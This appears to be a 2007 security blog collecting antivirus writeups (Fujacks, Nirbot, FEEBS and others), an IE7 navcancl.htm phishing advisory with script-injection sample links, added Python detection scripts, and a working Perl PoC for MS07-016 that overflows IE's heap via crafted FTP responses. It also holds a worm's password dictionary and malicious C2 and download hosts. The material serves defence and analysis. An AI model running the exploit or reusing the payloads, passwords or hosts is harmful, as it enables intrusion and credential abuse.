"It's a problem with the updates, and it's a problem with the implementation," said Edelmann.
If mail is received from a server running Exchange 2007, users are unlikely to encounter problems. However, if mail is received from servers running Exchange 2000 or 2003, the likelihood of quarantining is high, said Edelmann.
"OneCare is a new product — they shouldn't have rolled it out when they did, but they're fixing the problems now," said Edelmann.
According to the security manager, security is only a small part of what Microsoft does, suggesting it does not have as much security expertise as established security vendors.
"Microsoft is not a security company. Security is important, but it's just a little part of Microsoft," said Edelmann.
Security vendor Kaspersky said that it was not acceptable for two Microsoft products — such as OneCare and Exchange 2007 — to be incompatible, especially as Microsoft has market dominance.
"Microsoft, welcome to our business," said Eugene Kaspersky, the founder of the company. "All in all it's a bad thing. It's not acceptable for Microsoft products to do that. Microsoft dominates the market. If they do that it creates a big noise, many affected people, and happy lawyers."
This is not the first time Microsoft has had a problem with OneCare and Outlook. In January OneCare also erroneously quarantined Outlook files. However, Kaspersky said that although the problems then and now were the same, the cause of the problems in January was different.
"They fixed the first false positive, and now they have the next one," said Kaspersky.
Kaspersky said that false positives are not just a problem for Microsoft, but for the whole antivirus industry. He said that about 1 percent of Kaspersky records were false positives, but they were almost totally stopped by the company's test robots. He added, however, that sometimes false positives are released by Kaspersky.
Microsoft purchased the Romanian GeCAD company in 2003.
Labels: Anti-Virus, Microsoft, News Article
Phishing using IE7 local resource vulnerability
Summary
Internet Explorer 7.0 is vulnerable to cross-site scripting in one of its local resources. In combination with a design flaw in this specific local resource it is possible for an attacker to easily conduct phishing attacks against IE7 users.
Affected versions
• Windows Vista - Internet Explorer 7.0
• Windows XP - Internet Explorer 7.0
Technical Details
The navcancl.htm local resource is used by the browser when for some reason a navigation to a specific page is canceled.
When a navigation is canceled the URL of the specific page is provided to the navcancl.htm local resource after the # sign. For example: res://ieframe.dll/navcancl.htm#http://www.site.com. The navcancl.htm page then generates a script in the “Refresh the page.” link in order to reload the provided site again when the user clicks on this link.
It is possible to inject a script in the provided link which will be executed when the user clicks on the “Refresh the page.” link.
Luckily, Internet Explorer now runs most of its local resources (including navcancl.htm) in the "Internet Zone", so this vulnerability cannot be used for remote code execution.
Unfortunately, there is also a design flaw in IE7. The browser automatically removes the URL path of the local resource and leaves only the provided URL. For example: when the user visits res://ieframe.dll/navcancl.htm#http://www.site.com, IE7 will show http://www.site.com in the address bar.
To perform a phishing attack, an attacker can create a specially crafted navcancl.htm local resource link with a script that will display a fake content of a trusted site (e.g. bank, paypal, MySpace).
When the victim opens the link sent by the attacker, a "Navigation Canceled" page is displayed. The victim will assume the site or the network had an error and try to refresh the page. Once the "Refresh the page." link is clicked, the attacker's content (e.g. a fake login page) is displayed, and the victim believes they are on the trusted site because the address bar shows the trusted site's URL.
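The attack above depends on two things a filter can see in a link before anyone clicks it: the res:// scheme, which has no reason to appear in external mail or web content, and script characters in the fragment that navcancl.htm will splice into its "Refresh the page." handler. The classifier below is an added example, not part of this advisory, and runs over a constructed list of links whose site names are placeholders. For each res:// link it also reports what IE7 would show in the address bar, so an analyst can see which trusted site the link impersonates.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed links for the example. The first three are ordinary; the rest have the shape described
# above: a res:// local resource whose fragment is what IE7 shows in the address bar.
SAMPLE_LINKS = [
    "http://www.site.com/login",
    "https://www.paypal.com/",
    "http://www.site.com/page#section-2",
    "res://ieframe.dll/navcancl.htm#http://www.site.com",
    "res://ieframe.dll/navcancl.htm#http://www.site.com/?q=';document.body.innerHTML='fake login'",
    "RES://ieframe.dll/navcancl.htm#https://www.paypal.com/%3Cscript%3E",
    "res://shdoclc.dll/dnserror.htm#http://example.org/",
]

# Characters and prefixes that have no business in a URL that navcancl.htm will splice into script.
SCRIPT_HINT = re.compile(r"""[<>'"();]|javascript:|vbscript:""", re.IGNORECASE)


def classify_link(url):
    """Return (verdict, displayed_url, reason); verdict is allow, review or block."""
    parts = urlsplit(url)                      # urlsplit lower-cases the scheme
    if parts.scheme != "res":
        return ("allow", url, "not a local resource URL")
    fragment = unquote(parts.fragment)         # decode %3C etc. before looking for script
    shown = urlsplit(fragment)
    is_navcancl = parts.netloc.lower() == "ieframe.dll" and parts.path.lower() == "/navcancl.htm"
    if is_navcancl and SCRIPT_HINT.search(fragment):
        return ("block", parts.fragment,
                f"script injected into navcancl.htm; address bar would show {shown.scheme}://{shown.netloc}")
    if is_navcancl:
        return ("review", parts.fragment, "navcancl.htm link; address bar would show the fragment, not res://")
    return ("review", url, "res:// local resource linked from external content")


def filter_links(links):
    """Bucket links by verdict; the 'block' bucket is what a mail or proxy filter would drop."""
    buckets = {"allow": [], "review": [], "block": []}
    for link in links:
        verdict, shown, reason = classify_link(link)
        buckets[verdict].append((link, shown, reason))
    return buckets


if __name__ == "__main__":
    for verdict, items in filter_links(SAMPLE_LINKS).items():
        for link, shown, reason in items:
            print(f"{verdict:6} {link}\n       shows: {shown}\n       {reason}")
```

The script-character list is a heuristic, so a res:// link with a clean fragment is still reported for review rather than allowed: nothing legitimate sends one, and the fix itself remains Microsoft's.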
Proof-of-Concept
A CNN.com article spoofing proof-of-concept can be found here.
If you are not using IE7, you can watch a demonstration video here.
Workaround / Suggestion
Until Microsoft fixes this vulnerability, do not trust the “Navigation Canceled” page!
Labels: Exploit, http, Microsoft, Vulnerability
W32.Fujacks.BH W32/Catcher-A
Discovered: March 14, 2007
Also Known As: W32/Fujacks.z [McAfee], W32/Fujacks.dll [McAfee]
Type: Virus, Worm
Infection Length: 80,384 bytes
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP
Once executed, the worm copies itself as the following files:
%System%\[RANDOM].dll
%System%\[RANDOM].exe
The worm creates the following registry entry so that it runs every time Windows starts:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{21LYYSYS-9421-2126-L2Y1-L2Y1Y1S3Y1S4}\"StubPath" = "%System%\[RANDOM].exe"
The worm injects itself into the following processes:
Explorer.exe
Services.exe
Winlogon.exe
The worm attempts to download a file from the following URL:
[http://]www.lovesa.info/logo[REMOVED]
Note: At the time of writing, the file was unavailable.
The worm scans the compromised computer and prepends itself to .exe and .scr files. It avoids infecting files located in the following folders:
ComPlus Applications
Common Files
Delphi
Internet Explorer
Messenger
Microsoft Frontpage
Movie Maker
NetMeeting
Online Services
Outlook Express
RECYCLER
System Volume Information
System32
Temp
WINNT
Windows Media Player
Windows NT
WinRAR
Windows
Note: Executable files increase in size by 80,384 bytes.
The worm also appends a reference to the domain www.lovesa.info into all files it finds with the following extensions:
.asa
.asp
.aspx
.bat
.cdx
.cer
.css
.htm
.html
.inc
.jsp
.php
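The file-level effects described above give two checks that do not need the worm's signature: a prepended .exe or .scr carries the original DOS/PE header 80,384 bytes into the file, exactly the Infection Length, and an affected web file carries the worm's domain string. The script below is an added example, not Symantec's code. It runs on constructed in-memory samples; the iframe form of the injected reference is my guess, as the writeup only says a reference to www.lovesa.info is appended, so the check matches the domain string rather than a particular tag. The stub length is a parameter because other prepending infectors use other sizes.

```python
import struct

STUB_LEN = 80384                 # Infection Length from the writeup: the number of bytes the worm prepends
INJECTED_DOMAIN = b"www.lovesa.info"
EXE_EXTS = {".exe", ".scr"}
WEB_EXTS = {".asa", ".asp", ".aspx", ".bat", ".cdx", ".cer", ".css",
            ".htm", ".html", ".inc", ".jsp", ".php"}


def looks_like_pe(data, offset=0):
    """True if a DOS header at `offset` has an e_lfanew that lands on a PE signature inside `data`."""
    if data[offset:offset + 2] != b"MZ" or len(data) < offset + 0x40:
        return False
    e_lfanew, = struct.unpack_from("<I", data, offset + 0x3C)
    sig_at = offset + e_lfanew
    return data[sig_at:sig_at + 4] == b"PE\0\0"


def prepended_host_offset(data, stub_len=STUB_LEN):
    """Return stub_len when `data` is a PE image with a second PE image starting exactly stub_len in."""
    if looks_like_pe(data) and looks_like_pe(data, stub_len):
        return stub_len
    return None


def carve_host(data, stub_len=STUB_LEN):
    """Return the original executable that follows the worm stub, or None if not a prepend infection."""
    off = prepended_host_offset(data, stub_len)
    return None if off is None else data[off:]


def classify_file(name, data):
    """Apply the two file-level indicators by extension: prepend infection and web-file injection."""
    ext = name[name.rfind("."):].lower() if "." in name else ""
    if ext in EXE_EXTS and prepended_host_offset(data) is not None:
        return ("infected-prepend", f"second PE header at offset {STUB_LEN}")
    if ext in WEB_EXTS and INJECTED_DOMAIN in data:
        return ("web-injection", f"{INJECTED_DOMAIN.decode()} referenced")
    return ("clean", "")


def make_fake_pe(payload, pe_offset=0x80):
    """Build a minimal PE-shaped blob (MZ header, e_lfanew, PE signature, payload): constructed test
    data only, not a runnable executable."""
    hdr = bytearray(pe_offset)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, pe_offset)
    return bytes(hdr) + b"PE\0\0" + payload


# Constructed samples: a clean host, the same host with an 80,384-byte PE-shaped stub in front,
# and a web page with an appended reference to the worm's domain.
CLEAN_EXE = make_fake_pe(b"\x00" * 512)
WORM_STUB = make_fake_pe(b"\xCC" * (STUB_LEN - 0x84))       # 0x80 header + 4-byte signature + padding
INFECTED_EXE = WORM_STUB + CLEAN_EXE
CLEAN_HTML = b"<html><body>hello</body></html>\n"
INJECTED_HTML = CLEAN_HTML + b'<iframe src="http://www.lovesa.info/" width=0 height=0></iframe>\n'

if __name__ == "__main__":
    for name, data in [("setup.exe", CLEAN_EXE), ("setup.exe", INFECTED_EXE),
                       ("index.htm", CLEAN_HTML), ("index.htm", INJECTED_HTML)]:
        print(f"{name:10} {len(data):6} bytes -> {classify_file(name, data)}")
```

carve_host() returns the bytes after the stub, which for a pure prepender is the original executable; compare its hash against a known-good copy before trusting it, since the writeup only says the worm prepends itself and a variant could also patch the host.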
The worm uses the following list of passwords in an attempt to copy itself to available network shares:
000000
00000000
1
110
111
111111
11111111
12
120
121212
123
123123
123321
1234
12345
123456
1234567
12345678
123456789
1234qwer
123abc
123asd
123qwe
2000
2004
2005
2006
2007
2008
2k
321
4321
5021314
520
5201314
520520
54321
654321
88888
88888888
999999
Admin
Administrator
Password
Root
abc
abc123
abcd
abcd123
admin
admin123
administrator
adsl
asdf
asdf123
bye
byebye
cctv
china
computer
data
database
date
enable
foobar
fuck
fuckyou
ghost
god
godblessyou
goodbye
guest
guest123
guest321
hao123
happy
home
ihavenopass
iloveyou
internet
japan
kaonima
live
login
love
loveyou
mylove
mypass
mypass123
no
oracle
pass
passwd
password
pwd
qq
qwer
root
sa
server
sex
super
sybase
temp
temp123
test
test123
user
users
wangba
window
windows
windows2000
windows2003
windowsxp.
xp
xxx
yxcv
zxcv
The worm then attempts to copy itself as one of the following filenames:
FuckJacks.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe
c0nime.exe
iexpl0re.exe
nvscv32.exe
spoclsv.exe
svch0st.exe
Threat Assessment
Wild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Moderate
Damage
Damage Level: Medium
Payload: Infects various files.
Distribution
Distribution Level: Medium
Shared Drives: Copies itself to network shares.
Writeup By: Jeong Mun
Labels: Anti-Virus, Microsoft, Worm
Malware type: JavaScript
Aliases: No Alias Found
In the wild: Yes
Destructive: No
Language: English
Platform: Windows 98, ME, NT, 2000, XP, Server 2003
Encrypted: No
Overall risk rating: Low
Reported infections: Low
Damage potential: High
Distribution potential: High
Malware Overview
This malicious JavaScript is usually embedded in a malicious Web site and is run on a system when a user visits the said Web site. It may also arrive on a system as an attachment to a mass-mailed email message.
Upon execution, it decodes and drops a file detected by Trend Micro as WORM_FEEBS.OV. As a result, routines of the related worm may be exhibited on the affected system.
It also displays a fake loading page that displays the following message:
Error while decrypting file
Solution:
(Note: Close all instances of Internet Explorer before proceeding with the solution below.)
Important Windows ME/XP Cleaning Instructions
Users running Windows ME and XP must disable System Restore to allow full scanning of infected computers.
Users running other Windows versions can proceed with the succeeding solution set(s).
Running Trend Micro Antivirus
If you are currently running in safe mode, please restart your computer normally before performing the following solution.
Scan your computer with Trend Micro antivirus and delete files detected as JS_FEEBS.JM and WORM_FEEBS.OV. To do this, Trend Micro customers must download the latest virus pattern file and scan their computer. Other Internet users can use HouseCall, the Trend Micro online virus scanner.
Labels: http, Microsoft, Virus
Win32/Nirbot Family
Threat Assessment
Overall Risk: Low
Wild: Low
Destructiveness: Medium
Pervasiveness: Medium
Characteristics
Type: Worm
Category: Win32
Also known as
W32/Delbot (Sophos),
W32.Rinbot (Symantec), Backdoor.Win32.VanBot (Kaspersky)
Description
Win32/Nirbot is a family of IRC-controlled backdoors that can be used to gain unauthorized access to a victim's machine. They can also exhibit worm-like functionality by exploiting many different software vulnerabilities, including SYM06-010 and MS06-040.
Method of Infection
When executed, Win32/Nirbot copies itself to the %System% directory using filenames such as:
arman.exe
atievx.exe
crcss.exe
lemsrv.exe
msync.exe
navscnr.exe
netadp.exe
prevx.exe
rinsv.exe
symmec.exe
It then makes the following registry modification to ensure this copy is executed at each Windows start:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\<value name> = "<path to the worm's copy>"
where <value name> differs depending on the variant, for example:
ATI Active Graphics Card Monitor
JW Manager
LEMSRV
Network Bridge
Random Interface Network Manager
Symmetrical Network
Syncronization
Nirbot continuously checks for and sets the above registry entry.
The worm also creates a mutex to avoid running multiple instances of itself.
Note: '%System%' is a variable location. The malware determines the location of the current System folder by querying the operating system. The default installation location for the System directory for Windows 2000 and NT is C:\Winnt\System32; for 95, 98 and ME it is C:\Windows\System; and for XP it is C:\Windows\System32.
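As an added example (not Microsoft's own tooling), the following Python parses a regedit export of the Run key and flags entries whose value name or target file name matches the lists above. On a Windows host the export would come from `reg export` or regedit; the export text embedded here is constructed for the demonstration, and the "Syncronization" spelling is kept exactly as the writeup gives it because that is what would appear in the registry.

```python
import re

# Value names the writeup lists for the Run-key entry (spelling as given).
NIRBOT_RUN_VALUE_NAMES = {
    "ATI Active Graphics Card Monitor", "JW Manager", "LEMSRV",
    "Network Bridge", "Random Interface Network Manager",
    "Symmetrical Network", "Syncronization",
}
# File names the writeup lists for the copy dropped in %System%.
NIRBOT_FILENAMES = {
    "arman.exe", "atievx.exe", "crcss.exe", "lemsrv.exe", "msync.exe",
    "navscnr.exe", "netadp.exe", "prevx.exe", "rinsv.exe", "symmec.exe",
}
# Key paths and value names are compared case-insensitively, as the registry does.
RUN_KEY = r"hkey_local_machine\software\microsoft\windows\currentversion\run"

# Constructed sample export (not taken from a real host): one benign entry
# and two that should be flagged.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VendorTray"="\"C:\\Program Files\\Example\\tray.exe\""
"LEMSRV"="C:\\WINNT\\System32\\lemsrv.exe"
"Updater"="C:\\WINNT\\System32\\netadp.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Notes"="C:\\Program Files\\Example\\notes.exe"
'''

# "name"="string" lines; .reg files escape backslash and quote inside the data.
VALUE_LINE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def unescape_reg(s):
    """Undo .reg escaping: \\ becomes \ and \" becomes " in one pass."""
    return re.sub(r'\\(.)', r'\1', s)


def parse_reg_export(text):
    """Parse the subset of the .reg format needed here: [key] headers and
    "name"="string" lines. Other value types (dword:, hex:) and the default
    value (@=) are ignored. Returns {key_lowercased: {name: data}}."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        m = VALUE_LINE_RE.match(line)
        if m and current is not None:
            keys[current][unescape_reg(m.group(1))] = unescape_reg(m.group(2))
    return keys


def target_basename(data):
    """Basename of the program a Run value launches: the quoted token if the
    data starts with a quote, else everything up to the first space."""
    d = data.strip()
    prog = d[1:].split('"', 1)[0] if d.startswith('"') else d.split(" ", 1)[0]
    return prog.replace("/", "\\").split("\\")[-1].lower()


def find_suspicious_run_entries(text):
    """Return [(value_name, data, reason)] for HKLM Run entries whose value
    name or target file name appears in the writeup's lists."""
    names_lc = {n.lower() for n in NIRBOT_RUN_VALUE_NAMES}
    findings = []
    for name, data in parse_reg_export(text).get(RUN_KEY, {}).items():
        reasons = []
        if name.lower() in names_lc:
            reasons.append("value name")
        if target_basename(data) in NIRBOT_FILENAMES:
            reasons.append("file name")
        if reasons:
            findings.append((name, data, " and ".join(reasons)))
    return findings


if __name__ == "__main__":
    for name, data, reason in find_suspicious_run_entries(SAMPLE_EXPORT):
        print(f"{name!r} -> {data} (matched by {reason})")
```

Version 5.00 exports written by regedit or `reg export` are UTF-16 with a byte-order mark, so decode the file as UTF-16 before handing its text to `parse_reg_export`. The value-name match is the weaker of the two signals, since the names above are chosen to look like legitimate software; the file-name match against the %System% copy is what makes a hit worth escalating.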
Method of Distribution
Via Exploit
Win32/Nirbot spreads by exploiting a number of vulnerabilities in Windows operating systems and third-party applications. Nirbot's spreading routine starts with scanning for vulnerable target machines. The worm can generate random values for all or part of each IP address it targets.
Nirbot variants can spread by exploiting the following vulnerabilities:
Symantec Client Security and Symantec AntiVirus Elevation of Privilege (SYM06-010)
The worm opens a configurable port on the compromised machine and runs a TFTP server. The worm probes remote machines on port 2967 to determine if they are prone to the SYM06-010 vulnerability. If successful, the worm executes a small amount of code on the target machine that instructs it to connect back to the running TFTP server and retrieve a copy of the worm.
For more information on this vulnerability, please visit the following:
http://www.symantec.com/avcenter/security/Content/2006.05.25.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2630
Microsoft Windows Server service buffer overflow vulnerability (TCP port 139)
The worm creates an HTTP server on the system on a random port. The worm also checks if the IP address of the local machine partially matches a list of IPs contained in its code, for example:
192.168.*.*
10.*.*.*
111.*.*.*
15.*.*.*
16.*.*.*
101.*.*.*
110.*.*.*
112.*.*.*
170.65.*.*
If the IP does not match, the worm instructs the machine vulnerable to this exploit to connect back to the HTTP server running on the system and retrieve a copy of the worm. If the IPs do match, the worm executes a small amount of code on the targeted machine that instructs it to download a copy of the worm from a specific domain. The following is a list of domains and IPs that Nirbot variants have been observed to download from:
66.29.116.82
58.20.109.39
digiflex.info
t3arj3rk.com
sw1tchbck.net
pennysheet.com
jimmybuttons.com
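To make the address check concrete, here is an added Python example (not the worm's code) that implements the octet-wildcard matching the writeup describes against the patterns listed above, and reports which of the two retrieval routes a given local address would select: the domain download when the address matches, the worm's own HTTP server when it does not. The writeup says the list carried in the worm's code is longer, so the patterns here are only the examples it gives; the route names are labels chosen for this example.

```python
import ipaddress

# Patterns the writeup gives as examples of the address list carried in the
# worm's code (it notes the real list is longer).
NIRBOT_IP_PATTERNS = [
    "192.168.*.*", "10.*.*.*", "111.*.*.*", "15.*.*.*", "16.*.*.*",
    "101.*.*.*", "110.*.*.*", "112.*.*.*", "170.65.*.*",
]


def pattern_to_network(pattern):
    """Turn an octet-wildcard pattern such as '170.65.*.*' into an
    IPv4Network ('170.65.0.0/16'). Only trailing wildcards are accepted,
    which is all the writeup shows; anything else raises ValueError."""
    octets = pattern.split(".")
    if len(octets) != 4:
        raise ValueError(f"expected four octets in {pattern!r}")
    fixed = []
    for octet in octets:
        if octet == "*":
            break
        if not (octet.isdigit() and 0 <= int(octet) <= 255):
            raise ValueError(f"bad octet {octet!r} in {pattern!r}")
        fixed.append(octet)
    if any(o != "*" for o in octets[len(fixed):]):
        raise ValueError(f"wildcards must be trailing in {pattern!r}")
    addr = ".".join(fixed + ["0"] * (4 - len(fixed)))
    return ipaddress.ip_network(f"{addr}/{8 * len(fixed)}")


def is_valid_pattern(pattern):
    """True if pattern_to_network accepts the pattern."""
    try:
        pattern_to_network(pattern)
    except ValueError:
        return False
    return True


def matching_patterns(ip, patterns=NIRBOT_IP_PATTERNS):
    """All patterns the address falls under (the worm only needs one)."""
    addr = ipaddress.ip_address(ip)
    return [p for p in patterns if addr in pattern_to_network(p)]


def retrieval_path(local_ip, patterns=NIRBOT_IP_PATTERNS):
    """Which of the two routes the writeup describes the victim being sent
    down, given the infected host's own address."""
    if matching_patterns(local_ip, patterns):
        return "download from domain"
    return "fetch from worm's HTTP server"


if __name__ == "__main__":
    for ip in ("192.168.1.7", "170.65.3.4", "203.0.113.9"):
        print(ip, matching_patterns(ip), "->", retrieval_path(ip))
```

For a network defender the useful reading is the inverse: a host whose address matches one of these ranges would be told to fetch from the listed domains, so egress to those names is the thing to watch there, while a host outside the ranges would instead receive an inbound HTTP connection to a random high port on the infected peer.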
For more information on this vulnerability, please visit the following:
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34486
http://www.microsoft.com/technet/security/Bulletin/MS06-040.mspx
Microsoft Windows RPCSS malformed DCOM message buffer overflow vulnerabilities (TCP port 135)
If the worm finds a machine vulnerable to this exploit, it executes a small amount of code on the targeted machine that instructs it to retrieve a copy of the worm. This is also done through a TFTP server the worm creates on the compromised system on a configurable port.
For more information on this vulnerability, please visit the following:
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=25975
http://www.microsoft.com/technet/security/bulletin/MS03-039.mspx
Exploiting weak passwords on MS SQL servers, including the Microsoft SQL Server Desktop Engine blank 'sa' password vulnerability (TCP port 1433)
If Win32/Nirbot finds an exploitable machine, it attempts to log into SQL server accounts 'sa', 'root' and 'admin'. It attempts to authenticate these accounts using several passwords stored in its code. If the worm successfully logs into an account, it sends code to the remote machine instructing it to retrieve a copy of itself.
For more information on this vulnerability, please visit the following:
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=5705
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q321081
Payload: Backdoor Functionality
Nirbot is an IRC-controlled backdoor. Variants of the worm usually attempt to connect to between two and four IRC servers before joining a specific channel. The following is a list of some known IRC servers Nirbot variants have attempted connection to (generally on port 8080, although this differs between variants):
crusade.godhatesfags.com
is.wayne.brady.gonna.have.to.chokeabitch.us
lol.godhatesfags.com
phatcamp.org
x.anti-viral.us
x.pennysheet.com
x.rofflewaffles.us
When the worm connects to one of these servers and joins a channel, whoever controls that channel has control of the compromised machine. Once the victim's computer is under control, the overseer is able to instruct Nirbot to attempt malicious operations such as spreading.
Via its backdoor, the trojan can also be instructed to:
- Retrieve system information such as operating system details
- Download and execute files from the Internet
- Run a SOCKS proxy on the affected host
- Perform a Denial of Service attack
- Execute commands on the affected host
- Update itself
- Remove itself
- Steal CD keys
Downloads and Executes Arbitrary Files
When first run, some Nirbot variants download and execute a file. The file is downloaded from a specific domain and is usually executed from the C:\ directory. Downloaded files are usually Win32/Amahkey trojan variants, for example Win32/Amahkey.F.
Analysis by Amir Fouda
Labels: Anti-Virus, Microsoft, Virus, Worm
Troj/IMspam-B is a Trojan for the Windows platform.
Name Troj/IMspam-B
Type Trojan
Affected operating systems Windows
Side effects Forges the sender's email address. Uses its own emailing engine. Downloads code from the internet
Troj/IMspam-B is a mass spamming tool that targets MSN Messenger, Windows Live Messenger, AOL Instant Messenger and email addresses.
When run Troj/IMspam-B closes all other instances of itself and removes all EXEs in the root folder of the C drive.
Sample text appears as:
"Heeey i saw a pic of u online HAHAHA check
"
At the time of writing, the EXE downloaded from the malicious link is detected as W32/Delbot-U.
Labels: Anti-Virus, Microsoft, Trojan, Virus
W32.Messmulti
Risk Level 1: Very Low
Discovered: March 12, 2007
Type: Worm
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP
W32.Messmulti is a worm that sends a link to itself through multiple instant messengers or chat programs.
Threat Assessment
Wild
Wild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
Damage
Damage Level: Low
Payload: Sends a link to itself through multiple instant messengers or chat programs.
Distribution
Distribution Level: Low
Writeup By: Masaki Suenaga
Labels: Microsoft, Worm
Name Troj/DownLdr-QP
Type Trojan
Affected operating systems Windows
Side effects Downloads code from the internet
Aliases Trojan-Downloader.Win32.Delf.yj
Troj/DownLdr-QP includes functionality to access the internet and communicate with a remote server via HTTP.
When first run Troj/DownLdr-QP copies itself to:
\niw.exe
\impai.exe
and creates the following files:
\Content.IE5\89irkl2n\cd321[1].htm
\Content.IE5\od6fwfox\677977[1].htm
These files may be deleted.
Labels: Microsoft, Virus
Brian Krebs on Computer Security
Online Anti-Virus Scans: A Free Second Opinion
Periodic online virus scanning is a good idea for Windows users, even for people already using up-to-date anti-virus tools. There are a couple of reasons I suggest this: First, anti-virus software is frequently slow to spot new threats. Take a gander at the daily "unrecognized" stats posted by Shadowserver.org, which tracks the performance (or lack thereof) of several popular tools in spotting new variants. That list currently examines the performance of several free programs, but the reality is not much different with the commercial tools. Just have a look at performance metrics and virus detection failure rates chronicled here (virustotal.com) and here.
The second reason follows from the first: If something nasty does make it past your security defenses, usually the first thing it will try to do is disable the active protection and update features in those tools. In such cases, you probably would not know about the infection unless you turned to a third-party program that is not already installed on your computer.
In my experience, two of the better free online anti-virus scanners are Panda Software's PandaScan and Kaspersky Lab's Free Virus Scan. Both require that you run the scans using Internet Explorer, as both require the installation of an ActiveX plug-in to do the job.
F-Secure Corp., CA and BitDefender also offer free online scanners that also use IE and ActiveX, but I haven't yet tried those so I can't offer an opinion on them.
TrendMicro's HouseCall service lets you install and run a free scanning tool from inside an IE or Firefox browser. However, I found the program both annoying -- it emitted a series of very loud and startling tones through my computer speakers while downloading virus definitions -- and ineffective. It crashed halfway through the scan, taking all of my other open Firefox windows with it, including an earlier, unsaved version of this blog post. (I had hoped Firefox 2.0's crash-recovery feature would save what I had typed as it had in previous crashes, but no such luck this time.)
If you have just a single file or archive that you'd like to scan, I'd suggest submitting it to VirusTotal, a free online anti-virus engine that will scan your submission against more than two dozen of the most well-known tools.
Depending on the speed of your PC and the number of files and hard drives you have, conducting an online scan can take between a few minutes to several hours to complete. It's not a bad idea to run the scan only when you can afford to be away from the PC for a few hours, or perhaps right before bedtime. Even on my test machine -- which sports a 2.2 GHz processor and 2 gigabytes of memory -- running several of the online scanners interfered with the simplest of tasks, such as composing an e-mail.
Labels: Microsoft, Virus
Proof of concept code for MS FTP Server Response vulnerability.
===============================
#!/usr/bin/perl
# MS 07-016 FTP Server Response PoC
# Usage: ./ms07016ftp.pl [LISTEN_IP]
#
# Tested Against: MSIE 6.02900.2180 (SP2)
#
# Details: The response is broken into buffers, either at length 1024,
# or at '\r\n'. Each buffer is appended with \x00, without
# bounds checking. If the response is exactly 1024 characters
# in length, you will overflow the heap with the string \x00.
use IO::Socket;
use strict;
# Create listener
my $ip=shift || '127.0.0.1';
my $sock = IO::Socket::INET->new(Listen=>1,
LocalHost=>$ip,
LocalPort=>'21',
Proto=>'tcp');
$sock or die ("Could not create listener.\nMake sure no FTP server is running, and you are running this as root.\n");
# Wait for initial connection and send banner
my $sock_in = $sock->accept();
print $sock_in "220 waa waa wee waa\r\n";
# Send response code with total length of response = 1024
while (<$sock_in>){
my $response;
if($_ eq "USER") { $response="331 ";}
elsif($_ eq "PASS") { $response="230 ";}
elsif($_ eq "syst") { $response="215 ";}
elsif($_ eq "CWD") { $response="250 ";}
elsif($_ eq "PWD") { $response="230 ";}
else { $response="200 ";}
print $sock_in $response."A"x(1024-length($response)-2)."\r\n";
}
close($sock);
# milw0rm.com [2007-03-09]
Labels: Exploit, Microsoft
An interesting article from the BBC; however, the author misses the easiest way, which is to stop using Windows. If you must use Windows, then it is possible to make Windows more secure than it is by default. This stops many malware attacks.
========================================================================